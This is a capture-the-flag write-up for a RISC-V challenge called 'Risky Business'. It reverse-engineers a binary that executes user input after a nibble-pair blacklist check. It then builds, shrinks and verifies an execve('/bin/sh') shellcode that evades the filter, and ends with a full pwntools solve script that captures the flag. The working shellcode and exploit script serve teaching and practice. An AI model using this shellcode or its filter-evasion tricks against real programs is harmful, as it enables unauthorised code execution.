Writeup by edoardo3512 for Risky Business

Table of contents

Binary

The given binary risky-business is a 64 bit, dynamically linked executable, compiled for Risc-V.

$ file risky-business
risky-business: ELF 64-bit LSB pie executable, UCB RISC-V, RVC, double-float ABI, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-riscv64-lp64d.so.1, for GNU/Linux 4.15.0, BuildID[sha1]=2bb703ff4a5af43fb10e8ca4fd8a39b488a701f7, not stripped

$ checksec risky-business
[*] 'risky-business'
    Arch:       riscv64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

To execute it we can download the libraries for risc-v with sudo apt install libc6-riscv64-cross and run it under QEMU with qemu-riscv64 -L /usr/riscv64-linux-gnu ./risky-business. Unfortunately it doesn’t give us any information as the program just takes an input and exists without any output, so let’s go decompile it with Ghidra to see what it is doing.

Understanding the program

This is the main() function of the program, decompiled by Ghidra after I renamed the variables.

void main(void)

{
  int len;
  char next_nibble;
  int a;
  int b;
  uint i;
  char buffer [72];
  long canary;
  char previous_nibble;

  canary = ___stack_chk_guard;
  fgets(buffer,0x43,_stdin);
  len = strlen(buffer);
  a = len - 1;
  b = len - 2;
  previous_nibble = buffer[len + -1] >> 4;
  for (i = (len - 1) * 2; -1 < i; i--) {
    if ((i & 1) == 0) {
      next_nibble = buffer[a] & 0xf;
      a = a + -1;
    }
    else {
      next_nibble = buffer[b] >> 4;
      b = b + -1;
    }

    if ((((previous_nibble == 7) && (next_nibble == 3)) ||
        ((previous_nibble == 0 && (next_nibble == 0)))) ||
       ((previous_nibble == 0 && (next_nibble == 10)))) goto exit;
    previous_nibble = next_nibble;
  }
  (*(code *)buffer)(buffer);
exit:
  if (canary != ___stack_chk_guard) {
    exit(0);
  }
  return;
}

We can see that we first read a 66 bytes input (0x43 includes the null terminator of the string), and then check each pair of nibbles in our input to blacklist the combinations 0x73, 0x00, 0x0a. If we pass the check our input is executed. So this challenge is a shellcode challenge with blacklist. If the restriction was only on bytes this check would mainly prevent us from using a syscall instruction in our input (ecall is b"\x73\x00\x00\x00") or to hardcode /bin/sh in our input as 0x73 is also the value for s. Unfortunately we will have a few more complications since it’s not just checking the bytes, but let’s think about it later.

The thing we want to be careful about with the fact that 0x0a is blacklisted is that when we send our shellcode we can not let it finish with a \n. fgets will wait until we send 66 bytes or a line terminator, but if it receives the new line it will be included in the string that is checked and make us fail. The intuitive solution is therefore to just make sure we always send as much data as fgets is expecting.

Another option is to terminate ourself the shellcode with a null byte so that it will be \x00\x0a and the line terminator will be ignored by the program. While thinking about this explanation though I realised something I could have used to simplify a bit the challenge, do you see it ?

Think about what is being checked exactly.

Yes, the check expects the shellcode to be a continuous string, which seems intuitive since we are calling the function “get a string from a file”, but gets and fgets do not treat the null byte \x00 as a terminator, only the line terminator \x0a, this means that if we would have an instruction with a null byte at the beginning of the shellcode, we could write anything afterwards and it would not be checked. The only constraint would be the length.

Since \x00 is usually THE byte to avoid in any shellcode I really didn’t think about this when solving the challenge, but I kinda love the idea of almost having as a constraint that we MUST use it at some point and now I’m wondering if it was intended or not. But if you want to practice when you are done with this writeup, try to write your own shellcode this way ;-)

The other thing that I notice is that although checksec says the stack is not executable this doesn’t seem to be enforced. From what I found it is standard for RISC-V, or at least when running under qemu-user, to have the stack executable ignoring the NX flag, but I don’t know enough about it (https://github.com/riscvarchive/riscv-glibc/issues/5).

Writing the shellcode

Since I never worked with RISCV before, I started from a generic shellcode from shellstorm to call execve("/bin/sh") without using the bytes 0x20, 0x0a and 0x00. Here is the specific shellcode I used, long 76 bytes:

|   entry0 ();
|           0x000100b0      0111           addi sp, sp, -32
|           0x000100b2      06ec           sd ra, 24(sp)
|           0x000100b4      22e8           sd s0, 16(sp)
|           0x000100b6      13042102       addi s0, sp, 34
|           0x000100ba      b767696e       lui a5, 0x6e696
|           0x000100be      9387f722       addi a5, a5, 559
|           0x000100c2      2330f4fe       sd a5, -32(s0)
|           0x000100c6      b7776810       lui a5, 0x10687
|           0x000100ca      33480801       xor a6, a6, a6
|           0x000100ce      0508           addi a6, a6, 1
|           0x000100d0      7208           slli a6, a6, 0x1c
|           0x000100d2      b3870741       sub a5, a5, a6
|           0x000100d6      9387f732       addi a5, a5, 815
|           0x000100da      2332f4fe       sd a5, -28(s0)
|           0x000100de      930704fe       addi a5, s0, -32
|           0x000100e2      0146           li a2, 0
|           0x000100e4      8145           li a1, 0
|           0x000100e6      3e85           mv a0, a5
|           0x000100e8      9308d00d       li a7, 221
|           0x000100ec      93063007       li a3, 115
|           0x000100f0      230ed1ee       sb a3, -260(sp)
|           0x000100f4      9306e1ef       addi a3, sp, -258
\           0x000100f8      6780e6ff       jr -2(a3)

Understanding the RISCV shellcode

Reading the shellcode I identified 4 main sections.

Firstly it creates a new frame on the stack for this “function” and stores the registers ra and s0 to preserve them, but this can easily be removed since we don’t need to preserve the state of the process.

|           0x000100b0      0111           addi sp, sp, -32  # sp = sp - 32
|           0x000100b2      06ec           sd ra, 24(sp)     # *(sp + 24) = ra
|           0x000100b4      22e8           sd s0, 16(sp)     # *(sp + 16) = s0
|           0x000100b6      13042102       addi s0, sp, 34   # s0 = sp + 34

Then it builds /bin and /sh\x00 in the register a5, stores the complete string /bin/sh\x00 on the stack and then loads the pointer to it into a5. a6 is used to compute the null terminator in /sh\x00 without having to put a null byte in the shellcode.

|           0x000100ba      b767696e       lui a5, 0x6e696   # a5 = 0x6e696000 [a5 = b"\x00`in"]
|           0x000100be      9387f722       addi a5, a5, 559  # a5 = a5 + 0x22f [a5 = b"/bin"]
|           0x000100c2      2330f4fe       sd a5, -32(s0)    # *(s0 - 32) = a5
|           0x000100c6      b7776810       lui a5, 0x10687   # a5 = 0x10687000 [a5 = b"\x00\xph\0x10"]
|           0x000100ca      33480801       xor a6, a6, a6    # a6 = 0x0
|           0x000100ce      0508           addi a6, a6, 1    # a6 = 0x1
|           0x000100d0      7208           slli a6, a6, 0x1c # a6 = 0x10000000
|           0x000100d2      b3870741       sub a5, a5, a6    # a5 = a5 - a6    [a5 = b"\x00\ph\x00"]
|           0x000100d6      9387f732       addi a5, a5, 815  # a5 = a5 + 0x32f [a5 = b"/sh\x00"]
|           0x000100da      2332f4fe       sd a5, -28(s0)    # *(s0 - 28) = a5
|           0x000100de      930704fe       addi a5, s0, -32  # a5 = s0 - 32

Next it loads all the arguments for the syscall execve("/bin/sh\x00", 0, 0), where a7 is used for the syscall code while a0 to a2 are the arguments.

|           0x000100e2      0146           li a2, 0          # args[2] = 0
|           0x000100e4      8145           li a1, 0          # args[1] = 0
|           0x000100e6      3e85           mv a0, a5         # args[0] = &bin_sh
|           0x000100e8      9308d00d       li a7, 221        # sys_execve

Finally, since the ecall instruction also contains null bytes, this shellcode generates it in a3, saves it on the stack (that we remember is executable) and then jumps to it. It has to jump relative to the register and not directly onto it though to avoid instructions that have a null byte. (jr 0(a3) would use a null byte due to the offset 0x00, while jalr xx, a3 has null byte in the instruction itself.)

|           0x000100ec      93063007       li a3, 115        # a3 = 0x0000000073
|           0x000100f0      230ed1ee       sb a3, -260(sp)   # *(sp - 260) = a3
|           0x000100f4      9306e1ef       addi a3, sp, -258 # a3 = sp - 258
\           0x000100f8      6780e6ff       jr -2(a3)         # jump (a3 - 2)

Simplify the shellcode

To use this shellcode we have two problems to solve. First of all the shellcode is too long for our challenge, but we will also see soon, it has a few nibble pairs that are not allowed.

We can quickly start by removing the part of the shellcode that defines the new stack frame, focus on making the shellcode valid, and then look into how to shorten it further if needed. I will start by cutting the first 4 instructions and use directly sp instead of s0 when storing b"/bin/sh\x00" on the stack.

   0:   6e6967b7   lui     a5, 0x6e696
   4:   22f78793   addi    a5, a5, 559
   8:   fef13023   sd      a5, -32(sp)
   c:   106877b7   lui     a5, 0x10687
  10:   01084833   xor     a6, a6, a6
  14:   0805       addi    a6, a6, 1
  16:   0872       slli    a6, a6, 0x1c
  18:   410787b3   sub     a5, a5, a6
  1c:   32f78793   addi    a5, a5, 815
  20:   fef13223   sd      a5, -28(sp)
  24:   fe010793   addi    a5, sp, -32
  28:   4601       li      a2, 0
  2a:   4581       li      a1, 0
  2c:   853e       mv      a0, a5
  2e:   0dd00893   li      a7, 221
  32:   07300693   li      a3, 115
  36:   eed10e23   sb      a3, -260(sp)
  3a:   efe10693   addi    a3, sp, -258
  3e:   ffe68067   jr      -2(a3)

You may notice that the byte representation of the instructions is different. This is a change in endianness between how they were represented on shellstorm and how pwnlib.disasm(), that I’m using here, represents them. This later representation in little-endian though is better for our challenge since it coincides with the order in which the nibble pairs are being checked. This new shellcode now is long exactly 66 bytes, but we can see that the li ax, ... instructions have a 00 pair in them and li a3, 115 also contains a 73 pair.

To solve this problem we can do some math instead of loading directly 221 into a7. The factors of 221 are 13 and 17, so we can load our register with:

  2e:   4335       li      t1, 13
  30:   42c5       li      t0, 17
  32:   026288b3   mul     a7, t0, t1

Then for a3 we just have to use an offset from a7 we just computed.

  36:   f9688693   addi    a3, a7, 115 - 221

Unfortunately the shellcode is now too long, with 70 bytes and we will have to modify it even further, but I’m not super confident I will not break it by accident (spoiler, I did; a few times…), so let’s make sure that it continues to work. Skip the next section though if you just want to go to the solution.

Make sure the shellcode is always correct

This script will first check that we don’t have pairs of nibbles that are blacklisted, then execute the program and change the length of fgets at runtime to make sure the whole shellcode is read even if ours is currently too long. If at the end we reached execve("/bin/sh\x00", NULL, NULL) we know the current iteration of the shellcode is valid and that we only have to shorten it further, if not we can pinpoint which instruction didn’t behave as expected. I will not go through all the mistakes I made while writing the shellcode, but at least here is how I found them.

To debug your programs emulated with QEMU remember that you first need to install gdb-multiarch and link the libraries directly with qemu sudo ln -s /usr/riscv64-linux-gnu/ /etc/qemu-binfmt/riscv64.

from gdb_plus import *

binary_name = "risky-business"

# Make sure to set the context so that pwntools will use gdb-multiarch to debug the program
exe  = ELF(binary_name, checksec=True)
context.binary = exe

# Already setup the ip of the server for when we will want to get the flag
HOST = "127.0.0.1"
PORT = 4000
dbg = Debugger(f"./{binary_name}", aslr=False).remote(HOST, PORT)

shellcode = asm("""
lui a5, 0x6e696
addi a5, a5, 559
sd a5, -32(sp)
lui a5, 0x10687
xor a6, a6, a6
addi a6, a6, 1
slli a6, a6, 0x1c
sub a5, a5, a6
addi a5, a5, 815
sd a5, -28(sp)
addi a5, sp, -32
li a2, 0
li a1, 0
mv a0, a5
li t1, 13
li  t0, 17
mul a7, t0, t1
addi a3, a7, 115 - 221
sb a3, -260(sp)
addi a3, sp, -258
jr -2(a3)
""").ljust(0x42, b"A")

# Make sure the program respects the blacklist
def nibble_string(shellcode):
    nibbles = ""
    for i, _ in enumerate(shellcode):
        nibbles += shellcode[::-1].hex()[i*2]
        nibbles += shellcode[::-1].hex()[i*2+1]
    return nibbles

assert "73" not in nibble_string(shellcode)
assert "0a" not in nibble_string(shellcode)
assert "00" not in nibble_string(shellcode)
log.success("The shellcode is valid!")

# Change the argument of fgets to the length of our payload
def extend_read(dbg):
    size = dbg.args[1]
    if len(shellcode) >= size:
        log.warn(f"Your shellcode is still too long! {len(shellcode)}/{size - 1}")
        dbg.args[1] = len(shellcode) + 1 # Overwrite the argument
    return False # Tell gdb to not stop after executing the callback
dbg.b("fgets", callback=extend_read)

CALL_SHELLCODE = 0x896 # Address taken from ghidra
dbg.until(CALL_SHELLCODE, wait=False) # Let the program run until it jumps to the shellcode
dbg.p.sendline(shellcode)

If we then step with gdb to check what the shellcode is doing we indeed get the correct result

 ► 0x4001802d9c    ecall   <SYS_execve>
        path: 0x4001802e80 ◂— 0x68732f6e69622f /* '/bin/sh' */
        argv: 0
        envp: 0

We can also automate the check so that we just have to execute the script to know immediately that the shellcode is still working without going manually with GDB.

...
CALL_SHELLCODE = 0x896
done = dbg.until(CALL_SHELLCODE, wait=False)
dbg.p.sendline(shellcode)
if args.QUICK: # We define a new argument for when to enter this loop
  done.wait() # Wait for the program to reach the breakpoint
  try:
    dbg.until(dbg.sp - 260, hw=True) # hardware breakpoint because that address will be overwritten by our shellcode, so we can not use a software breakpoint.
    assert dbg.next_inst.mnemonic == "ecall"
    assert dbg.read_string(dbg.syscall_args[0]) == b"/bin/sh"
    assert dbg.syscall_args[1] == 0
    assert dbg.syscall_args[2] == 0
  except Exception:
    log.error("The shellcode is wrong! Check manually where it messed up.")
  log.success("The shellcode is still right! You can go on.")
  dbg.close()

$ python3 ./solve.py QUICK
[+] Starting local process '/usr/bin/qemu-riscv64': pid 51087
[+] The shellcode is valid!
[!] Your shellcode is still too long! 70/66
[+] The shellcode is still right! You can go on.
[*] Stopped process './risky-business' (pid 51087)

Find 4 more bytes to remove

We can continue to optimises the shellcode. The first thing we can see is that it is using a5 to store the pointer to b"/bin/sh\x00" and then moving it a0 while we can store it there immediately. This removes 2 bytes. My second optimisation came by looking at the length of xor, a6, a6, a6 which is 4 bytes long, while li a2, 0 is only long 2 bytes. One option is to try li a6, 0 which is also 2 bytes long; the other one is to use a register that is used more often such as a1, and this would have removed 2 bytes both from the xor and from the sub a5, a5, a6.

   0:   6e6967b7   lui     a5, 0x6e696
   4:   22f78793   addi    a5, a5, 559
   8:   fef13023   sd      a5, -32(sp)
   c:   106877b7   lui     a5, 0x10687
  10:   4801       li      a6, 0
  12:   0805       addi    a6, a6, 1
  14:   0872       slli    a6, a6, 0x1c
  16:   410787b3   sub     a5, a5, a6
  1a:   32f78793   addi    a5, a5, 815
  1e:   fef13223   sd      a5, -28(sp)
  22:   fe010513   addi    a0, sp, -32
  26:   4601       li      a2, 0
  28:   4581       li      a1, 0
  2a:   4335       li      t1, 13
  2c:   42c5       li      t0, 17
  2e:   026288b3   mul     a7, t0, t1
  32:   f9688693   addi    a3, a7, -106
  36:   eed10e23   sb      a3, -260(sp)
  3a:   efe10693   addi    a3, sp, -258
  3e:   ffe68067   jr      -2(a3)

But now do you see an even simpler options to shorten the shellcode that I missed while solving the challenge ?

Quiz moment. Click for the solution.

Of course we can use a shift instruction to set the null byte in /sh\x00 instead of wasting 10 bytes with a6. You just have to be careful to not load directly 0x68732 as the s of sh is still blacklisted, but since we need an addi instruction anyway for the last nibble it’s not a problem to change the last 12 bits.

   c:   687117b7   lui     a5, 0x68711   # a5 = 0x68711000
  10:   83a1       srli    a5, a5, 0x8   # a5 = 0x00687110
  12:   21f78793   addi    a5, a5, 0x21f # a5 = 0x0068732f
  16:   fef13223   sd      a5, -28(sp)

Otherwise you can try to compute 0x0068732f as a5 - 0x6e00ef00, but I don’t like the number of null bytes there.

Execute final exploit

from gdb_plus import *

binary_name = "risky-business"

exe  = ELF(binary_name, checksec=True)
context.binary = exe

IP = "127.0.0.1"
PORT = 4000
dbg = Debugger(f"./{binary_name}", aslr=False).remote(IP, PORT)

shellcode = asm("""
lui     a5, 0x6e696
addi    a5, a5, 559 # 0x6e69622f
sd      a5, -32(sp)
lui     a5, 0x10687
li      a6, 0
addi    a6, a6, 1
slli    a6, a6, 0x1c
sub     a5, a5, a6
addi    a5, a5, 815 # 0x1068732f
sd      a5, -28(sp)
addi    a0, sp, -32
li      a2, 0
li      a1, 0
li      t1, 13
li      t0, 17
mul     a7, t0, t1
addi    a3, a7, -106
sb      a3, -260(sp)
addi    a3, sp, -258
jr      -2(a3)
""").ljust(0x42, b"A")

def nibble_string(shellcode):
    nibbles = ""
    for i, _ in enumerate(shellcode):
        nibbles += shellcode[::-1].hex()[i*2]
        nibbles += shellcode[::-1].hex()[i*2+1]
    return nibbles

assert "73" not in nibble_string(shellcode)
assert "0a" not in nibble_string(shellcode)
assert "00" not in nibble_string(shellcode)
log.success("The shellcode is valid!")

def extend_read(dbg):
    size = dbg.args[1]
    if len(shellcode) >= size:
        log.warn(f"Your shellcode is still too long! {len(shellcode)}/{size - 1}")
        dbg.args[1] = len(shellcode) + 1
    return False
dbg.b("fgets", callback=extend_read)

CALL_SHELLCODE = 0x896
done = dbg.until(CALL_SHELLCODE, wait=False)
dbg.p.sendline(shellcode)

if args.QUICK:
  done.wait()
  try:
    dbg.until(dbg.sp - 260, hw=True)
    assert dbg.next_inst.mnemonic == "ecall"
    assert dbg.read_string(dbg.syscall_args[0]) == b"/bin/sh"
    assert dbg.syscall_args[1] == 0
    assert dbg.syscall_args[2] == 0
  except Exception:
    log.error("The shellcode is wrong! Check manually where it messed up.")
  log.success("The shellcode is still right! You can go on.")
  dbg.close()

sleep(0.1) # Wait for the execution of the shellcode to finish .
dbg.p.sendline(b"cat flag.txt")
flag = dbg.p.recvline().decode()
log.success(f"FLAG: {flag}") # You won <3

And the exploit works both locally

$ python3 ./solve.py NOPTRACE
[+] Starting local process './risky-business': pid 25461
[+] The shellcode is valid!
[!] Debug is off, gdb commands won't be executed
[+] FLAG: test_flag{solved}
[*] Stopped process './risky-business' (pid 25461)

and remotely

$ python3 ./solve.py REMOTE
[+] Opening connection to 127.0.0.1 on port 4000: Done
[+] The shellcode is valid!
[!] Debug is off, gdb commands won't be executed
[+] FLAG: <REDACTED>
[*] Closed connection to 127.0.0.1 port 4000

Challenge solved! We saw how to write a simple shellcode in risc-v and that the stack may be executable. Furthermore I relearned that fgets has no problem at all reading null bytes, although it would be time for me to remember it…

Your turn now!